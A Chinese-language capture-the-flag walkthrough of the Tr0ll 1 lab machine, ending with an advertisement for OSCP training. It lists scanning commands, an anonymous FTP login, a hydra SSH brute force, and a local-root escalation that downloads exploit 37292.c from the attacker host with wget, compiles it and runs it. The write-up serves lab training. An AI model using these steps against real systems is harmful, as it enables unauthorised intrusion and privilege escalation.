一、将靶机导入虚拟机

下载Tr0ll 1

链接：https://pan.quark.cn/s/d8d5e9084d50

解压后在虚拟机里打开，然后网络连接改为NAT模式,或者改成自定义的VMnet8(NAT模式)

二、探测靶机IP（进行信息收集）

nmap -sS -sV -T4 192.168.253.0/24 -A

使用 -A 可以一次性获取目标主机更多的信息，如操作系统类型、开放服务的详细信息、潜在的安全漏洞等

21端口可以进行匿名登录，而且三个端口都是打开的，先去看看80端口

三、进行目录枚举

dirb http://192.168.253.138/

四、到网页进行信息收集（80端口）

直接访问进去就看到一个图片，写hey non hacker 不要黑客 problem？

看到一个secret的页面，秘密，进去就看到看到作者的嘲笑，你无能狂怒了吗

robots.txt文件里

Disallow: /secret 明确指出 /secret 目录被禁止爬虫访问，这很可能暗示该目录下存在敏感信息，比如配置文件、未公开的管理页面、数据库备份文件等。打靶过程中，这类被隐藏的内容往往是漏洞发现和权限提升的关键突破点，但这里感觉真没什么东西

dirsearch -u http://192.168.253.138/secret -e *

dirsearch 是一款用 Python 编写的开源 Web 目录扫描工具，用于在目标网站上查找隐藏的目录和文件

-u 是 dirsearch 命令中的一个参数，用于指定要扫描的目标 URL

-e 也是 dirsearch 命令的一个参数，用于指定要扫描的文件扩展名

* 是一个通配符，这里表示扫描所有可能的文件扩展名

尝试去看看secret这个目录的结果，发现有两个passwd，但是这些目录和文件都没权限去访问，全是403

在这个80端口没找到什么有用的信息，因为前面还有一个21和22端口，再去尝试

五、FTP匿名登录并Wireshark流量分析

FTP（File Transfer Protocol）即文件传输协议，是用于在网络上进行文件传输的标准协议

ftp匿名登录，匿名登录的名字写FTP或者ftp都可以，密码不用输，将在powershell上连接，直接下载在主机上，可以看到有一个.pcap的文件，可以去使用wireshark进行流量分析，然后就可以在这个Usersyzy66的目录最下面看到lol.pcap文件，然后直接拖到wireshark里进行分析

FTP 协议在传输过程中使用明文传输用户名、密码和文件内容，可以先筛选看看

发现一个用户名和密码还有传输了一个文档，然后再回去看看输入了什么其他的命令

anonymous password

登录进去看了没有什么东西

这里输入了一个LIST命令，查看这个文本文档的权限

发现这里又有一个下载文件，看到这一句话

retr：是Retrieve的缩写，在 FTP 协议里是一个命令关键字，功能是从服务器端下载指定文件到客户端

Well, well, well, aren't you just a clever little devil, you almost found the sup3rs3cr3tdirlol :-Pn

Sucks, you were so close... gotta TRY HARDER!n

哎呀呀，你还真是个聪明的小机灵鬼呢，你差点就找到超超级秘密文件夹啦，哈哈

真可惜，你都已经很接近了……还得再加把劲啊！

六百六十六，这里sup3rs3cr3tdirlol很像一个隐藏目录名

六、隐藏目录

确实是一个目录

这里有一个roflmao，下载下来看看，发现没有权限去执行，直接赋予权限

sudo chmod 777 roflmao

Find address 0x0856BF to proceed

找到地址 0x0856BF 以继续操作

尝试一下发现又是一个目录

进入goodluck文件夹，发现一个文本文档

这个文本文档存的应该是用户名，Definitely not this one（绝对不是这个），一般来说包是，但其实一般不是

再去另一个文件夹this_folder_contains_the_password

这个Pass.txt只有一个 Good_job_:)

七、ssh爆破（hydra）

直接将这个文件下载下来

wget http://192.168.253.138/0x0856BF/this_folder_contains_the_password/Pass.txt

再将上面的用户名写到一个文档里去，我建了一个user.txt

hydra -L user.txt -P Pass.txt 192.168.253.138 ssh -v

发现没有爆破出来，到后面才知道这个要改成小写的p

大写的P 用于指定包含多个密码的文件，而 小写的p 用于指定一个单一的密码，所以说密码就是Pass.txt

六百六十六

再次尝试爆破

hydra -L user.txt -p Pass.txt 192.168.253.138 ssh -v

发现用户overflow 密码Pass.txt

八、反弹shell

反弹shell成功，这里可以切换成bin/bash

现在就进行内网的信息收集了，没看到什么东西就被踢了出来，第二次去查看版本信息

查看版本信息

uname -a 
lsb_release -a

看到ubuntu 14.04.1包有历史漏洞

九、提权

searchsploit

searchsploit ubuntu 14.04.1 Privilege

Privilege（表示提权的意思，可以提高搜索效率）

发现就一个符合，下载下来去试试

searchsploit -m 37292.c

下载好之后上传到靶机进行编译

Python 会在当前目录下启动一个 HTTP 服务器，默认端口为8000

python -m http.server

先进入临时目录，/tmp 目录一般对普通用户具有读写权限

cd /tmp
wget http://192.168.253.129:8000/37292.c

不得不说，这玩意关的真快

下载成功后进行编译

gcc -o exp 37292.c

提权成功，得到flag

END

oscp有对红队工作感兴趣，或者有意报考oscp的师傅，可以考虑一下我们的培训课程，加我微信咨询，好处如下：

1.报考后课程随时可看，并且如果对考试没有信心，还可以留群跟第二批课程学习，不限次数时间，报考即是一辈子可看

2.200+台靶机及官方课程，lab靶机+域的内容团队泷老师和小羽老师会带大家全部过一遍，并且群内随时答疑，团队老师及群友都会积极解答，全天可答疑

3.目前可接受分期付款，无利息，最多分四个月，第一次付完即可观看视频

4.加入课程可享受工作推荐机会，优秀者可内推至红队

5.报考即送送官方文档中文版，以及kali命令详解中文版，纯人工翻译，版权为团队所有

知识星球

还可以加入我们的知识星球，包含cs二开，甲壳虫，红盟工具等，还有很多src挖掘资料包